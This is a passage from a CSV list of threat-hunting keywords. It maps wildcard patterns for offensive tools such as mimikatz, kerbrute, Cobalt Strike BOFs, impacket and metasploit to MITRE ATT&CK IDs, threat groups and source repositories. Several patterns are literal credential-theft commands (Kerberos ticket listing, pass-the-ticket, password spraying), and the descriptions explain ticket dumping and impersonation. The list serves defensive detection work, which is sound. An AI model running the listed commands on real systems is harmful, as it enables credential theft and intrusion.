pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::list*,offensive_tool_keyword,mimikatz,mimikatz exploitation command,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::list*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. This function lists all Kerberos tickets in memory,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::ptc*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. 
mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::ptt *.kirbi*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,0,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*kerberos::ptt*,offensive_tool_keyword,mimikatz,mimikatz exploitation command,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::ptt*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::ptt*.kirbi*,offensive_tool_keyword,mimikatz,Mimikatz Unconstrained delegation. With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. we can impersonate the victim user towards any service in the domain.,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*kerberos::purge*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos::tgt*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*kerberos_enumusers.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*kerberos-ldap-password-hunter.sh*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*kerberosv5.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*kerbrute -*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,0,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*kerbrute bruteuser *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*kerbrute passwordspray *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*kerbrute userenum *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*kerbrute userenum *,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential 
Access,https://github.com/ropnop/kerbrute,1,0,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*kerbrute*bruteforce*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*kerbrute.go*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*kerbrute/cmd*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*kerbrute/util*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*kerbrute_*.exe*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*kerbrute_enum*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*kerbrute_linux*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z 
-*kerbrute_pass_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*kerbrute_user_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*kerbrute_userpass_wordlist_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*kerbrute_windows*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*KerbruteSession*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*kernel_shellcode.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*kernelcallbacktable.x64*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*kernelcallbacktable.x64*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*kernelcallbacktable.x86*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik 
Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*kernelcallbacktable.x86*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*kernel-exploits*,offensive_tool_keyword,Github Username,github repo name hosting windows kernel exploits,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/SecWiki/windows-kernel-exploits,1,1,N/A,N/A,10,7472,2852,2021-06-11T23:29:15Z,2017-04-25T04:02:31Z -*KernelMii.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tijme/kernel-mii,1,1,N/A,10,10,72,27,2023-05-07T18:38:29Z,2022-06-25T11:13:45Z -*KernelMii.x64.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tijme/kernel-mii,1,1,N/A,10,10,72,27,2023-05-07T18:38:29Z,2022-06-25T11:13:45Z -*KernelMii.x64.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tijme/kernel-mii,1,1,N/A,10,10,72,27,2023-05-07T18:38:29Z,2022-06-25T11:13:45Z -*KernelMii.x86.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tijme/kernel-mii,1,1,N/A,10,10,72,27,2023-05-07T18:38:29Z,2022-06-25T11:13:45Z -*KernelMii.x86.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tijme/kernel-mii,1,1,N/A,10,10,72,27,2023-05-07T18:38:29Z,2022-06-25T11:13:45Z -*Kevin-Robertson/Inveigh*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - 
